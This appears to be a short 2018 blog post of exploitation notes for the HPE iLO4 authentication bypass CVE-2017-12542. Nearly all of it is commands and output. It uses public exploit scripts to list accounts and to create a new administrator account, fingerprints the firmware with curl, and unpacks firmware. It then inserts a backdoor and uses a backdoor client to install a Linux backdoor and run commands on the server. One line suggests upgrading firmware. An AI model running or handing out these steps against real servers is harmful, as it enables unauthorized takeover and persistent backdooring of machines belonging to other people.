Month: June 2018

HPE iLO4 Authentication Bypass and RCE (CVE-2017-12542)

HPE iLO4 Authentication Bypass and RCE (CVE-2017-12542)

This shows just a few notes for exploiting CVE-2017-12542.  I am currently looking at various RCE’s and backdoors available for different iLO versions and will hopefully do more articles soon.

How to list user accounts on HPE iLO 4
If you just need to list user accounts on the HPE iLO, you can use the following python script //github.com/skelsec/CVE-2017-12542 or Metasploit module (//www.rapid7.com/db/modules/auxiliary/admin/hp/hp_ilo_create_admin_account)

$ git clone //github.com/skelsec/CVE-2017-12542
$ cd CVE-2017-12542
$ python exploit_1.py -t x.x.x.x
[+] Target is VULNERABLE!
[+] Account name: User Account Username: Administrator

How to create a new user on HPE iLO 4
Should you want to create a new account on the HPE iLO, you can use the same script as above from //github.com/skelsec/CVE-2017-12542 or Metasploit module (//www.rapid7.com/db/modules/auxiliary/admin/hp/hp_ilo_create_admin_account)

$ git clone //github.com/skelsec/CVE-2017-12542 $ cd CVE-2017-12542
$ python exploit_1.py -u newadmin -p newadmin x.x.x.x

RCE on the HPE iLO
The Backdoor can be located at //github.com/airbus-seclab/ilo4_toolbox/tree/master/scripts/iLO4 and following HPE’s advisory it looks like all versions prior to version 2.53 for iLO4 are effected, as such if you are useing an old version in the corporate environment then you please consider upgrading the firwmware to version xx which can be obtained directly from HPE via this link to ver 2.60(30 May 2018).

Steps on how to get command execution on HP iLO and extract passwords

$ git clone //github.com/airbus-seclab/ilo4_toolbox
$ curl -s -k  //x.x.x.x/xmldata?item=all | grep -i “<FWRI>”
<FWRI>2.5.3</FWRI>

$ wget //downloads.hpe.com/pub/softlib2/software1/sc-linux-fw-ilo/p192122427/v129421/CP032487.scexe

$ chmod 755 CP032487.scexe

$ ./CP032487.scexe –unpack=/tmp/iLO

$ cd ilo4_toolbox/scripts/iLO4/

$ ./insert_backdoor.sh ilo4_253.bin

$ python backdoor_client.py x.x.x.x

ib.install_linux_backdoor()
ib.cmd(“/usr/bin/id”)
ib.remove_linux_backdoor()